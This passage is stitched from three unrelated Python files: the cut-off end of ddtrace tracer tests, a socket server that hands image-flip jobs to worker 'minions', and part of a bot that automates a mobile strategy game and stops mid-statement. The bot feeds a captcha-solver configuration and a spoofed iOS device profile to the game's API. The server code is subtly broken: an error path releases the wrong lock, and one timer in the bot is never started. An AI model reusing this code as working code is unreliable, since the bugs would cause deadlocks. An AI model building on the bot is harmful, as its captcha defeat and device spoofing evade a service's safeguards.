p = multiprocessing.Process(target=task, args=(tracer, q))
p.start()
p.join()
children_tag = q.get()
assert children_tag != span.get_tag("runtime-id")
def test_start_span_hooks():
t = ddtrace.Tracer()
result = {}
@t.on_start_span
def store_span(span):
result["span"] = span
span = t.start_span("hello")
assert span == result["span"]
span.finish()
def test_deregister_start_span_hooks():
t = ddtrace.Tracer()
result = {}
@t.on_start_span
def store_span(span):
result["span"] = span
t.deregister_on_start_span(store_span)
with t.start_span("hello"):
pass
assert result == {}
def test_enable(monkeypatch):
t1 = ddtrace.Tracer()
assert t1.enabled
monkeypatch.setenv("DD_TRACE_ENABLED", "false")
t2 = ddtrace.Tracer()
assert not t2.enabled
def test_runtime_id_parent_only():
tracer = ddtrace.Tracer()
# Parent spans should have runtime-id
s = tracer.trace("test")
rtid = s.get_tag("runtime-id")
assert isinstance(rtid, six.string_types)
# Child spans should not
s2 = tracer.trace("test2")
assert s2.get_tag("runtime-id") is None
s2.finish()
s.finish()
# Parent spans should have runtime-id
s = tracer.trace("test")
s.finish()
rtid = s.get_tag("runtime-id")
assert isinstance(rtid, six.string_types)
def test_runtime_id_fork():
tracer = ddtrace.Tracer()
s = tracer.trace("test")
s.finish()
rtid = s.get_tag("runtime-id")
assert isinstance(rtid, six.string_types)
pid = os.fork()
if pid == 0:
# child
s = tracer.trace("test")
s.finish()
rtid_child = s.get_tag("runtime-id")
assert isinstance(rtid_child, six.string_types)
assert rtid != rtid_child
os._exit(12)
_, status = os.waitpid(pid, 0)
exit_code = os.WEXITSTATUS(status)
assert exit_code == 12
def test_multiple_tracer_ctx():
t1 = ddtrace.Tracer()
t2 = ddtrace.Tracer()
with t1.trace("") as s1:
with t2.trace("") as s2:
pass
assert s2.parent_id == s1.span_id
assert s2.trace_id == s1.trace_id
def test_filters():
t = ddtrace.Tracer()
class FilterAll(object):
def process_trace(self, trace):
return None
t.configure(
settings={
"FILTERS": [FilterAll()],
}
)
t.writer = DummyWriter()
with t.trace("root"):
with t.trace("child"):
pass
spans = t.writer.pop()
assert len(spans) == 0
class FilterMutate(object):
def __init__(self, key, value):
self.key = key
self.value = value
def process_trace(self, trace):
for s in trace:
s.set_tag(self.key, self.value)
return trace
t.configure(
settings={
"FILTERS": [FilterMutate("boop", "beep")],
}
)
t.writer = DummyWriter()
with t.trace("root"):
with t.trace("child"):
pass
spans = t.writer.pop()
assert len(spans) == 2
s1, s2 = spans
assert s1.get_tag("boop") == "beep"
assert s2.get_tag("boop") == "beep"
# Test multiple filters
t.configure(
settings={
"FILTERS": [FilterMutate("boop", "beep"), FilterMutate("mats", "sundin")],
}
)
t.writer = DummyWriter()
with t.trace("root"):
with t.trace("child"):
pass
spans = t.writer.pop()
assert len(spans) == 2
for s in spans:
assert s.get_tag("boop") == "beep"
assert s.get_tag("mats") == "sundin"
class FilterBroken(object):
def process_trace(self, trace):
_ = 1 / 0
t.configure(
settings={
"FILTERS": [FilterBroken()],
}
)
t.writer = DummyWriter()
with t.trace("root"):
with t.trace("child"):
pass
spans = t.writer.pop()
assert len(spans) == 2
t.configure(
settings={
"FILTERS": [FilterMutate("boop", "beep"), FilterBroken()],
}
)
t.writer = DummyWriter()
with t.trace("root"):
with t.trace("child"):
pass
spans = t.writer.pop()
assert len(spans) == 2
for s in spans:
assert s.get_tag("boop") == "beep"
def test_early_exit():
t = ddtrace.Tracer()
t.writer = DummyWriter()
s1 = t.trace("1")
s2 = t.trace("2")
s1.finish()
s2.finish()
assert s1.parent_id is None
assert s2.parent_id is s1.span_id
traces = t.writer.pop_traces()
assert len(traces) == 1
assert len(traces[0]) == 2
s1 = t.trace("1-1")
s1.finish()
assert s1.parent_id is None
s1 = t.trace("1-2")
s1.finish()
assert s1.parent_id is None
class TestPartialFlush(TracerTestCase):
@TracerTestCase.run_in_subprocess(
env_overrides=dict(DD_TRACER_PARTIAL_FLUSH_ENABLED="true", DD_TRACER_PARTIAL_FLUSH_MIN_SPANS="5")
)
def test_partial_flush(self):
root = self.tracer.trace("root")
for i in range(5):
self.tracer.trace("child%s" % i).finish()
traces = self.tracer.writer.pop_traces()
assert len(traces) == 1
assert len(traces[0]) == 5
assert [s.name for s in traces[0]] == ["child0", "child1", "child2", "child3", "child4"]
root.finish()
traces = self.tracer.writer.pop_traces()
assert len(traces) == 1
assert len(traces[0]) == 1
assert traces[0][0].name == "root"
@TracerTestCase.run_in_subprocess(
env_overrides=dict(DD_TRACER_PARTIAL_FLUSH_ENABLED="true", DD_TRACER_PARTIAL_FLUSH_MIN_SPANS="1")
)
def test_partial_flush_too_many(self):
root = self.tracer.trace("root")
for i in range(5):
self.tracer.trace("child%s" % i).finish()
traces = self.tracer.writer.pop_traces()
assert len(traces) == 5
for t in traces:
assert len(t) == 1
assert [t[0].name for t in traces] == ["child0", "child1", "child2", "child3", "child4"]
root.finish()
traces = self.tracer.writer.pop_traces()
assert len(traces) == 1
assert traces[0][0].name == "root"
@TracerTestCase.run_in_subprocess(
env_overrides=dict(DD_TRACER_PARTIAL_FLUSH_ENABLED="true", DD_TRACER_PARTIAL_FLUSH_MIN_SPANS="6")
)
def test_partial_flush_too_few(self):
root = self.tracer.trace("root")
for i in range(5):
self.tracer.trace("child%s" % i).finish()
traces = self.tracer.writer.pop_traces()
assert len(traces) == 0
root.finish()
traces = self.tracer.writer.pop_traces()
assert len(traces) == 1
assert [s.name for s in traces[0]] == ["root", "child0", "child1", "child2", "child3", "child4"]
def test_unicode_config_vals():
t = ddtrace.Tracer()
with override_global_config(dict(version=u"😇", env=u"😇")):
with t.trace("1"):
pass
t.shutdown()
def test_ctx():
tracer = ddtrace.Tracer()
tracer.writer = DummyWriter()
with tracer.trace("test") as s1:
assert tracer.active_span() == s1
assert tracer.active_root_span() == s1
assert tracer.get_call_context().trace_id == s1.trace_id
assert tracer.get_call_context().span_id == s1.span_id
with tracer.trace("test2") as s2:
assert tracer.active_span() == s2
assert tracer.active_root_span() == s1
assert tracer.get_call_context().trace_id == s1.trace_id
assert tracer.get_call_context().span_id == s2.span_id
with tracer.trace("test3") as s3:
assert tracer.active_span() == s3
assert tracer.active_root_span() == s1
assert tracer.get_call_context().trace_id == s1.trace_id
assert tracer.get_call_context().span_id == s3.span_id
assert tracer.get_call_context().trace_id == s1.trace_id
assert tracer.get_call_context().span_id == s2.span_id
with tracer.trace("test4") as s4:
assert tracer.active_span() == s4
assert tracer.active_root_span() == s1
assert tracer.get_call_context().trace_id == s1.trace_id
assert tracer.get_call_context().span_id == s4.span_id
assert tracer.active_span() == s1
assert tracer.active_root_span() == s1
assert tracer.active_span() is None
assert tracer.active_root_span() is None
assert s1.parent_id is None
assert s2.parent_id == s1.span_id
assert s3.parent_id == s2.span_id
assert s4.parent_id == s1.span_id
assert s1.trace_id == s2.trace_id == s3.trace_id == s4.trace_id
assert s1.metrics[SAMPLING_PRIORITY_KEY] == 1
assert SAMPLING_PRIORITY_KEY not in s2.metrics
assert ORIGIN_KEY not in s1.meta
t = tracer.writer.pop_traces()
assert len(t) == 1
assert len(t[0]) == 4
_s1, _s2, _s3, _s4 = t[0]
assert s1 == _s1
assert s2 == _s2
assert s3 == _s3
assert s4 == _s4
with tracer.trace("s") as s:
assert s.parent_id is None
assert s.trace_id != s1.trace_id
def test_multithreaded():
tracer = ddtrace.Tracer()
tracer.writer = DummyWriter()
def target():
with tracer.trace("s1"):
with tracer.trace("s2"):
pass
with tracer.trace("s3"):
pass
for i in range(1000):
ts = [threading.Thread(target=target) for _ in range(10)]
for t in ts:
t.start()
for t in ts:
t.join()
traces = tracer.writer.pop_traces()
assert len(traces) == 10
for trace in traces:
assert len(trace) == 3
def test_ctx_distributed():
tracer = ddtrace.Tracer()
tracer.writer = DummyWriter()
# Test activating an invalid context.
ctx = Context(span_id=None, trace_id=None)
tracer.activate(ctx)
assert tracer.active_span() is None
with tracer.trace("test") as s1:
assert tracer.active_span() == s1
assert tracer.active_root_span() == s1
assert tracer.get_call_context().trace_id == s1.trace_id
assert tracer.get_call_context().span_id == s1.span_id
assert s1.parent_id is None
trace = tracer.writer.pop_traces()
assert len(trace) == 1
# Test activating a valid context.
ctx = Context(span_id=1234, trace_id=4321, sampling_priority=2, dd_origin="somewhere")
tracer.activate(ctx)
assert tracer.active_span() is None
assert (
tracer.get_call_context()
== tracer.active()
== Context(span_id=1234, trace_id=4321, sampling_priority=2, dd_origin="somewhere")
)
with tracer.trace("test2") as s2:
assert tracer.active_span() == s2
assert tracer.active_root_span() is s2
assert tracer.get_call_context().trace_id == s2.trace_id == 4321
assert tracer.get_call_context().span_id == s2.span_id
assert s2.parent_id == 1234
trace = tracer.writer.pop_traces()
assert len(trace) == 1
assert s2.metrics[SAMPLING_PRIORITY_KEY] == 2
assert s2.meta[ORIGIN_KEY] == "somewhere"
def test_manual_keep():
tracer = Tracer()
tracer.writer = DummyWriter()
# On a root span
with tracer.trace("asdf") as s:
s.set_tag(MANUAL_KEEP_KEY)
spans = tracer.writer.pop()
assert spans[0].metrics[SAMPLING_PRIORITY_KEY] is priority.USER_KEEP
# On a child span
with tracer.trace("asdf"):
with tracer.trace("child") as s:
s.set_tag(MANUAL_KEEP_KEY)
spans = tracer.writer.pop()
assert spans[0].metrics[SAMPLING_PRIORITY_KEY] is priority.USER_KEEP
def test_manual_keep_then_drop():
tracer = Tracer()
tracer.writer = DummyWriter()
# Test changing the value before finish.
with tracer.trace("asdf") as root:
with tracer.trace("child") as child:
child.set_tag(MANUAL_KEEP_KEY)
root.set_tag(MANUAL_DROP_KEY)
spans = tracer.writer.pop()
assert spans[0].metrics[SAMPLING_PRIORITY_KEY] is priority.USER_REJECT
def test_manual_drop():
tracer = Tracer()
tracer.writer = DummyWriter()
# On a root span
with tracer.trace("asdf") as s:
s.set_tag(MANUAL_DROP_KEY)
spans = tracer.writer.pop()
assert spans[0].metrics[SAMPLING_PRIORITY_KEY] is priority.USER_REJECT
# On a child span
with tracer.trace("asdf"):
with tracer.trace("child") as s:
s.set_tag(MANUAL_DROP_KEY)
spans = tracer.writer.pop()
assert spans[0].metrics[SAMPLING_PRIORITY_KEY] is priority.USER_REJECT
@mock.patch("ddtrace.internal.hostname.get_hostname")
def test_get_report_hostname_enabled(get_hostname):
get_hostname.return_value = "test-hostname"
tracer = Tracer()
tracer.writer = DummyWriter()
with override_global_config(dict(report_hostname=True)):
with tracer.trace("span"):
with tracer.trace("child"):
pass
spans = tracer.writer.pop()
root = spans[0]
child = spans[1]
assert root.get_tag(HOSTNAME_KEY) == "test-hostname"
assert child.get_tag(HOSTNAME_KEY) is None
@mock.patch("ddtrace.internal.hostname.get_hostname")
def test_get_report_hostname_disabled(get_hostname):
get_hostname.return_value = "test-hostname"
tracer = Tracer()
tracer.writer = DummyWriter()
with override_global_config(dict(report_hostname=False)):
with tracer.trace("span"):
with tracer.trace("child"):
pass
spans = tracer.writer.pop()
root = spans[0]
child = spans[1]
assert root.get_tag(HOSTNAME_KEY) is None
assert child.get_tag(HOSTNAME_KEY) is None
@mock.patch("ddtrace.internal.hostname.get_hostname")
def test_get_report_hostname_default(get_hostname):
get_hostname.return_value = "test-hostname"
tracer = Tracer()
tracer.writer = DummyWriter()
with override_global_config(dict(report_hostname=False)):
with tracer.trace("span"):
with tracer.trace("child"):
pass
spans = tracer.writer.pop()
root = spans[0]
child = spans[1]
assert root.get_tag(HOSTNAME_KEY) is None
assert child.get_tag(HOSTNAME_KEY) is None
def test_non_active_span():
tracer = Tracer()
tracer.writer = DummyWriter()
with tracer.start_span("test", activate=False):
assert tracer.active_span() is None
assert tracer.active_root_span() is None
assert tracer.active_span() is None
assert tracer.active_root_span() is None
traces = tracer.writer.pop_traces()
assert len(traces) == 1
assert len(traces[0]) == 1
with tracer.start_span("test1", activate=False):
with tracer.start_span("test2", activate=False):
assert tracer.active_span() is None
assert tracer.active_root_span() is None
assert tracer.active_span() is None
assert tracer.active_root_span() is None
traces = tracer.writer.pop_traces()
assert len(traces) == 2
with tracer.start_span("active", activate=True) as active:
with tracer.start_span("non active", child_of=active, activate=False):
assert tracer.active() is active
assert tracer.active_root_span() is active
assert tracer.active() is active
assert tracer.active_root_span() is active
traces = tracer.writer.pop_traces()
assert len(traces) == 1
assert len(traces[0]) == 2
|
server.py
|
import socket
import types
import logging
import threading
import tokens
import random
from storage import Storage
from collections import deque
from connection import Connection
from clientConnection import ClientConnection
from minionConnection import MinionConnection
from message.literalMessage import LiteralMessage
MSG_SIZE = 1024
class Server:
def __init__(self, host, port=50007):
"""Initialize the server object.
Args:
port (int): Port.
"""
self.host = host
self.port = port
self.storage = Storage()
self.minions = deque()
self.minions_lock = threading.Lock()
self.clients = deque()
self.clients_lock = threading.Lock()
def start(self):
"""Starts the server process.
"""
self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.socket.bind((self.host, self.port))
self.socket.listen(5)
logging.info("listening on {}:{}".format(self.host, self.port))
print("listening on ", (self.host, self.port))
listeningThread = threading.Thread(target=self.newConnectionTask, name='server_lister_thread')
listeningThread.start()
minionsThread = threading.Thread(target=self.minions_thread, name='minions_thread')
minionsThread.start()
clientThread = threading.Thread(target=self.clients_thread, name='clients_thread')
clientThread.start()
exit = False
while not exit:
command = input("Enter 'exit' to exit:")
if command.lower() == 'exit':
self.continueListening = False
self.continueMinions = False
self.continueClients = False
exit = True
listeningThread.join()
minionsThread.join()
clientThread.join()
def newConnectionTask(self):
self.continueListening = True
while self.continueListening:
try:
self.socket.settimeout(1)
conn, addr = self.socket.accept()
except BaseException:
self.socket.settimeout(None)
continue
self.socket.settimeout(None)
connection = Connection(conn, addr)
message = connection.receive_message()
connection.send_message(LiteralMessage(tokens.SUCESSFUL_CONNECTION))
connection = None
outputLog = "connected to {}:{} as a ".format(addr[0], addr[1])
if message.value == tokens.MINION_TOKEN:
self.minions_lock.acquire()
self.minions.append(MinionConnection(conn, addr))
self.minions_lock.release()
outputLog += "minion"
elif message.value == tokens.CLIENT_TOKEN:
self.clients_lock.acquire()
self.clients.append(ClientConnection(conn, addr))
self.clients_lock.release()
outputLog += "client"
else:
outputLog += "undefined"
logging.info(outputLog)
print(outputLog)
def minions_thread(self):
self.continueMinions = True
while(self.continueMinions):
self.minions_lock.acquire()
try:
minion = self.minions.popleft()
except IndexError:
self.minions_lock.release()
continue
try:
message = minion.receive_message(True, 1.0)
except Exception as e:
print(e)
logging.info(e)
self.clients_lock.release()
continue
if message is not None:
message = message.value
if self.try_decode_storages(minion, message):
pass
else:
print("Unknown message of value '{}', sended by the minion '{}'".format(message, minion.get_addr()))
if not minion.is_closed():
self.minions.append(minion)
else:
print('')
self.minions_lock.release()
def clients_thread(self):
self.continueClients = True
while(self.continueClients):
self.clients_lock.acquire()
try:
client = self.clients.popleft()
except IndexError:
self.clients_lock.release()
continue
try:
message = client.receive_message(True, 1.0)
except Exception as e:
message = "client '{}':{}".format(client.get_addr(), e)
print(message)
logging.info(message)
self.clients_lock.release()
continue
if message is not None:
message = message.value
if self.try_decode_storages(client, message):
pass
elif self.try_decode_client_job(client, message):
pass
else:
print("Unknown message of value '{}', sended by the client '{}'".format(message, client.get_addr()))
if not client.is_closed():
self.clients.append(client)
self.clients_lock.release()
# close connections with clients
self.clients_lock.acquire()
for connection in self.clients:
connection.close()
self.clients_lock.release()
def try_decode_storages(self, connection, token):
try:
if token == tokens.GET_FILE_SIZE:
filename = connection.receive_message().value
size = self.storage.get_file_size(filename)
connection.send_message(LiteralMessage(size))
elif token == tokens.IS_FILE:
filename = connection.receive_message().value
result = self.storage.is_file(filename)
connection.send_message(LiteralMessage(result))
elif token == tokens.GET_NUMBER_OF_FILES:
number = self.storage.get_number_of_files()
connection.send_message(LiteralMessage(number))
elif token == tokens.GET_NAME_OF_FILE:
index = connection.receive_message().value
name = self.storage.get_name_of_file(index)
connection.send_message(LiteralMessage(name))
elif token == tokens.SAVE_FILE:
filename = connection.receive_message().value
data = connection.receive_message().value
self.storage.save_file(filename, data)
elif token == tokens.REMOVE_FILE:
filename = connection.receive_message().value
self.storage.remove_file(filename)
elif token == tokens.GET_FILE:
filename = connection.receive_message().value
data = self.storage.get_file(filename)
connection.send_message(LiteralMessage(data))
else:
return False
except BaseException as e:
connection.send_literal(tokens.ERROR_MESSAGE)
errorMessage = "The storege operation from '{}' resulted in a exception: {}".format(connection.get_addr(), e)
connection.send_literal(errorMessage)
logging.error(errorMessage)
print(errorMessage)
return True
def try_decode_client_job(self, connection, token):
filename = None
dstfilename = None
if (token == tokens.JOB_FLIP_HORIZONTAL or
token == tokens.JOB_FLIP_VERTICAL or
token == tokens.JOB_ROTATE_90 or
token == tokens.JOB_ROTATE_180 or
token == tokens.JOB_ROTATE_270):
filename = connection.receive_message().value
dstfilename = connection.receive_message().value
else:
return False
if not self.storage.is_file(filename) or self.storage.is_file(dstfilename):
connection.send_literal(tokens.ERROR_MESSAGE)
loginfotext = "The job of client {} is not valid, the filename '{}' not exists or the dstfilename '{}' exists.".format(
connection.get_addr(),
filename,
dstfilename
)
connection.send_literal(loginfotext)
logging.error(loginfotext)
print(loginfotext)
else:
self.minions_lock.acquire()
minionIndex = random.randrange(0, len(self.minions))
minion = self.minions[minionIndex]
imagedata = self.storage.get_file(filename)
coreIndex = minion.send_job(imagedata, dstfilename, token)
loginfotext = "The Job '{}' submitted successfully by ty the client {} to the core {} of the minion {}".format(
tokens.token_to_str(token),
connection.get_addr(),
coreIndex,
minion.get_addr()
)
connection.send_literal(tokens.INFO_MESSAGE)
connection.send_literal(loginfotext)
logging.info(loginfotext)
print(loginfotext)
self.minions_lock.release()
return True
|
farmer.py
|
import math
import random
import threading
import time
import arrow
import numpy
import socketio
import tenacity
from lokbot.client import LokBotApi
from lokbot import logger, builtin_logger
from lokbot.exceptions import OtherException
from lokbot.enum import *
from lokbot.util import get_resource_index_by_item_code, run_functions_in_random_order
# Ref: https://stackoverflow.com/a/16858283/6266737
def blockshaped(arr, nrows, ncols):
"""
Return an array of shape (n, nrows, ncols) where
n * nrows * ncols = arr.size
If arr is a 2D array, the returned array should look like n subblocks with
each subblock preserving the "physical" layout of arr.
"""
h, w = arr.shape
assert h % nrows == 0, f"{h} rows is not evenly divisible by {nrows}"
assert w % ncols == 0, f"{w} cols is not evenly divisible by {ncols}"
return (arr.reshape(h // nrows, nrows, -1, ncols)
.swapaxes(1, 2)
.reshape(-1, nrows, ncols))
# Ref: https://stackoverflow.com/a/432175/6266737
def ndindex(ndarray, item):
if len(ndarray.shape) == 1:
try:
return [ndarray.tolist().index(item)]
except:
pass
else:
for i, subarray in enumerate(ndarray):
try:
return [i] + ndindex(subarray, item)
except:
pass
# Ref: https://stackoverflow.com/a/22550933/6266737
def neighbors(a, radius, row_number, column_number):
return [[a[i][j] if 0 <= i < len(a) and 0 <= j < len(a[0]) else 0
for j in range(column_number - 1 - radius, column_number + radius)]
for i in range(row_number - 1 - radius, row_number + radius)]
class LokFarmer:
def __init__(self, access_token, captcha_solver_config):
self.kingdom_enter = None
self.access_token = access_token
self.api = LokBotApi(access_token, captcha_solver_config, self._request_callback)
device_info = {
"OS": "iOS 15.3.1",
"country": "USA",
"language": "English",
"version": "1.1422.103.175",
"platform": "ios",
"build": "global"
}
self.kingdom_enter = self.api.kingdom_enter()
# knock moved to schedule job
self.api.auth_set_device_info(device_info)
self.api.chat_logs(self.kingdom_enter.get('kingdom').get('worldId'))
# [food, lumber, stone, gold]
self.resources = self.kingdom_enter.get('kingdom').get('resources')
self.buff_item_use_lock = threading.RLock()
self.march_start_lock = threading.RLock()
self.has_additional_building_queue = self.kingdom_enter.get('kingdom').get('vip', {}).get('level') >= 5
self.troop_queue = []
self.march_limit = 2
self._update_march_limit()
@staticmethod
def calc_time_diff_in_seconds(expected_ended):
time_diff = arrow.get(expected_ended) - arrow.utcnow()
diff_in_seconds = int(time_diff.total_seconds())
if diff_in_seconds < 0:
diff_in_seconds = 0
return diff_in_seconds + random.randint(5, 10)
def _is_building_upgradeable(self, building, buildings):
if building.get('state') != BUILDING_STATE_NORMAL:
return False
# 暂时忽略联盟中心
if building.get('code') == BUILDING_CODE_MAP['hall_of_alliance']:
return False
building_level = building.get('level')
current_building_json = building_json.get(building.get('code'))
if not current_building_json:
return False
next_level_building_json = current_building_json.get(str(building_level + 1))
for requirement in next_level_building_json.get('requirements'):
req_level = requirement.get('level')
req_type = requirement.get('type')
req_code = BUILDING_CODE_MAP.get(req_type)
if not [b for b in buildings if b.get('code') == req_code and b.get('level') >= req_level]:
return False
for res_requirement in next_level_building_json.get('resources'):
req_value = res_requirement.get('value')
req_type = res_requirement.get('type')
if self.resources[RESOURCE_IDX_MAP[req_type]] < req_value:
return False
return True
def _is_researchable(self, academy_level, category_name, research_name, exist_researches, to_max_level=False):
research_category = RESEARCH_CODE_MAP.get(category_name)
research_code = research_category.get(research_name)
exist_research = [each for each in exist_researches if each.get('code') == research_code]
current_research_json = research_json.get(research_code)
# already finished
if exist_research and exist_research[0].get('level') >= int(current_research_json[-1].get('level')):
return False
# minimum required level only
if not to_max_level and \
exist_research and \
exist_research[0].get('level') >= RESEARCH_MINIMUM_LEVEL_MAP.get(category_name).get(research_name, 0):
return False
next_level_research_json = current_research_json[0]
if exist_research:
next_level_research_json = current_research_json[exist_research[0].get('level')]
for requirement in next_level_research_json.get('requirements'):
req_level = int(requirement.get('level'))
req_type = requirement.get('type')
# 判断学院等级
if req_type == 'academy' and req_level > academy_level:
return False
# 判断前置研究是否完成
if req_type != 'academy' and not [each for each in exist_researches if
each.get('code') == research_category.get(req_type)
and each.get('level') >= req_level]:
return False
for res_requirement in next_level_research_json.get('resources'):
req_value = int(res_requirement.get('value'))
req_type = res_requirement.get('type')
if self.resources[RESOURCE_IDX_MAP[req_type]] < req_value:
return False
return True
def _update_kingdom_enter_building(self, building):
buildings = self.kingdom_enter.get('kingdom', {}).get('buildings', [])
self.kingdom_enter['kingdom']['buildings'] = [
b for b in buildings if
b.get('position') != building.get('position')
] + [building]
def _request_callback(self, json_response):
resources = json_response.get('resources')
if resources and len(resources) == 4:
logger.info(f'resources updated: {resources}')
self.resources = resources
def _upgrade_building(self, building, buildings, task_code):
if not self._is_building_upgradeable(building, buildings):
return 'continue'
try:
if building.get('level') == 0:
res = self.api.kingdom_building_build(building)
building = res.get('newBuilding', building)
else:
res = self.api.kingdom_building_upgrade(building)
building = res.get('updateBuilding', building)
except OtherException as error_code:
if str(error_code) == 'full_task':
logger.warning('building_farmer: full_task, quit')
return 'break'
logger.info(f'building upgrade failed: {building}')
return 'continue'
building['level'] += 1
self._update_kingdom_enter_building(building)
# TODO: it's necessary only when their server is not stable
building['state'] = BUILDING_STATE_NORMAL
threading.Timer(
self.calc_time_diff_in_seconds(res.get('newTask').get('expectedEnded')) - 5,
self._update_kingdom_enter_building,
[building]
)
threading.Timer(
self.calc_time_diff_in_seconds(res.get('newTask').get('expectedEnded')),
self.building_farmer_thread,
[task_code]
).start()
return
def _alliance_help_all(self):
try:
self.api.alliance_help_all()
except OtherException:
pass
def _alliance_research_donate_all(self):
try:
research_list = self.api.alliance_research_list()
except OtherException:
return
code = research_list.get('recommendResearch')
if not code:
code = 31101003 # 骑兵攻击力 1
try:
self.api.alliance_research_donate_all(code)
except OtherException:
pass
def _alliance_shop_autobuy(self, item_code_list=(ITEM_CODE_VIP_100,)):
try:
shop_list = self.api.alliance_shop_list()
except OtherException:
return
alliance_point = shop_list.get('alliancePoint')
shop_items = shop_list.get('allianceShopItems')
for each_shop_item in shop_items:
code = each_shop_item.get('code')
if code not in item_code_list:
continue
cost = each_shop_item.get('ap_1') # or 'ap_2'?
amount = each_shop_item.get('amount')
minimum_buy_amount = int(alliance_point / cost)
if minimum_buy_amount < 1:
continue
self.api.alliance_shop_buy(code, amount if amount < minimum_buy_amount else minimum_buy_amount)
def _get_land_with_level(self):
rank = self.api.field_worldmap_devrank().get('lands')
land_with_level = [[], [], [], [], [], [], [], [], [], []]
for index, level in enumerate(rank):
# land id start from 100000
land_with_level[int(level)].append(100000 + index)
return land_with_level
@staticmethod
def _get_land_array():
return numpy.arange(100000, 165536).reshape(256, 256)
def _get_nearest_land(self, x, y, radius=32):
land_array = self._get_land_array()
# current_land_id = land_array[y // 8, x // 8]
nearby_land_ids = neighbors(land_array, radius, y // 8 + 1, x // 8 + 1)
nearby_land_ids = [item for sublist in nearby_land_ids for item in sublist if item != 0]
land_with_level = self._get_land_with_level()
lands = []
for index, each_level in enumerate(reversed(land_with_level)):
level = 10 - index
if level < 3:
continue
lands += [(each_land_id, level) for each_land_id in each_level if each_land_id in nearby_land_ids]
return lands
def _get_top_leveled_land(self, limit=1024):
land_with_level = self._get_land_with_level()
lands = []
for index, each_level in enumerate(reversed(land_with_level)):
level = 10 - index
if level < 2:
continue
if len(each_level) > limit:
return lands + each_level[:limit]
lands += [(each, level) for each in each_level]
limit -= len(each_level)
return lands
def _get_zone_id_by_land_id(self, land_id):
land_array = blockshaped(self._get_land_array(), 4, 4)
return ndindex(land_array, land_id)[0]
def _update_march_limit(self):
troops = self.api.kingdom_profile_troops().get('troops')
self.troop_queue = troops.get('field')
self.march_limit = troops.get('info').get('marchLimit')
def _is_march_limit_exceeded(self):
if len(self.troop_queue) >= self.march_limit:
return True
return False
@staticmethod
def _calc_distance(from_loc, to_loc):
return math.ceil(math.sqrt(math.pow(from_loc[1] - to_loc[1], 2) + math.pow(from_loc[2] - to_loc[2], 2)))
def _start_march(self, to_loc, march_troops, march_type=MARCH_TYPE_GATHER):
res = self.api.field_march_start({
'fromId': self.kingdom_enter.get('kingdom').get('fieldObjectId'),
'marchType': march_type,
'toLoc': to_loc,
'marchTroops': march_troops
})
new_task = res.get('newTask')
new_task['endTime'] = new_task['expectedEnded']
self.troop_queue.append(new_task)
def _prepare_march_troops(self, each_obj, march_type=MARCH_TYPE_GATHER):
march_info = self.api.field_march_info({
'fromId': self.kingdom_enter.get('kingdom').get('fieldObjectId'),
'toLoc': each_obj.get('loc')
})
if march_type == MARCH_TYPE_MONSTER:
# check if monster is already dead
if march_info.get('fo').get('code') != each_obj.get('code'):
return []
troops = march_info.get('troops')
troops.sort(key=lambda x: x.get('code'), reverse=True) # priority using high tier troops
# todo: calc troops load
need_troop_count = march_info.get('fo').get('param').get('value')
if march_type == MARCH_TYPE_MONSTER:
need_troop_count *= 2.5
troop_count = sum([each_troop.get('amount') for each_troop in troops])
if need_troop_count > troop_count:
return []
# distance = self._calc_distance(from_loc, to_loc)
distance = march_info.get('distance')
logger.info(f'distance: {distance}, object: {each_obj}')
march_troops = []
for troop in troops:
amount = troop.get('amount')
code = troop.get('code')
if amount >= need_troop_count:
amount = need_troop_count
need_troop_count = 0
else:
need_troop_count -= amount
march_troops.append({
'code': code,
'amount': amount,
'level': 0,
'select': 0,
'dead': 0,
'wounded': 0,
'seq': 0
})
return march_troops
def _on_field_objects_gather(self, each_obj):
if each_obj.get('occupied'):
return
to_loc = each_obj.get('loc')
march_troops = self._prepare_march_troops(each_obj, MARCH_TYPE_GATHER)
if not march_troops:
return
self._start_march(to_loc, march_troops, MARCH_TYPE_GATHER)
def _on_field_objects_monster(self, each_obj):
to_loc = each_obj.get('loc')
march_troops = self._prepare_march_troops(each_obj, MARCH_TYPE_MONSTER)
if not march_troops:
return
self._start_march(to_loc, march_troops, MARCH_TYPE_MONSTER)
@tenacity.retry(
stop=tenacity.stop_after_attempt(4),
wait=tenacity.wait_random_exponential(multiplier=1, max=60),
reraise=True
)
def sock_thread(self):
"""
websocket connection of the kingdom
:return:
"""
url = self.kingdom_enter.get('networks').get('kingdoms')[0]
sio = socketio.Client(reconnection=False, logger=builtin_logger, engineio_logger=builtin_logger)
@sio.on('/building/update')
def on_building_update(data):
logger.info(f'on_building_update: {data}')
self._update_kingdom_enter_building(data)
@sio.on('/resource/upgrade')
def on_resource_update(data):
logger.info(f'on_resource_update: {data}')
self.resources[data.get('resourceIdx')] = data.get('value')
@sio.on('/buff/list')
def on_buff_list(data):
logger.info(f'on_buff_list: {data}')
self.has_additional_building_queue = len([
item for item in data if item.get('param', {}).get('itemCode') == ITEM_CODE_GOLDEN_HAMMER
]) > 0
item_list = self.api.item_list().get('items')
for buff_type, item_code_list in USABLE_BOOST_CODE_MAP.items():
already_activated = [item for item in data if item.get('param', {}).get('itemCode') in item_code_list]
if already_activated:
continue
item_in_inventory = [item for item in item_list if item.get('code') in item_code_list]
if not item_in_inventory:
continue
if not self.buff_item_use_lock.acquire(blocking=False):
return
code = item_in_inventory[0].get('code')
logger.info(f'activating buff: {buff_type}, code: {code}')
self.api.item_use(code)
if code == ITEM_CODE_GOLDEN_HAMMER:
self.has_additional_building_queue = True
self.buff_item_use_lock.release()
sio.connect(url, transports=["websocket"])
sio.emit('/kingdom/enter', {'token': self.access_token})
sio.wait()
@tenacity.retry(
stop=tenacity.stop_after_attempt(4),
wait=tenacity.wait_random_exponential(multiplier=1, max=60),
reraise=True
)
def socf_thread(self):
"""
websocket connection of the field
:return:
"""
world = self.kingdom_enter.get('kingdom').get('worldId')
url = self.kingdom_enter.get('networks').get('fields')[0]
from_loc = self.kingdom_enter.get('kingdom').get('loc')
lands = self._get_nearest_land(from_loc[1], from_loc[2])
# lands = self._get_top_leveled_land()
zones = []
for land_id, _ in lands:
zone_id = self._get_zone_id_by_land_id(land_id)
if zone_id not in zones:
zones.append(zone_id)
sio = socketio.Client(reconnection=False, logger=builtin_logger, engineio_logger=builtin_logger)
@sio.on('/field/objects')
def on_field_objects(data):
objects = data.get('objects')
for each_obj in objects:
if self._is_march_limit_exceeded():
continue
if not self.march_start_lock.acquire(blocking=False):
return
code = each_obj.get('code')
try:
if code in (
OBJECT_CODE_CRYSTAL_MINE,
):
self._on_field_objects_gather(each_obj)
if code in (
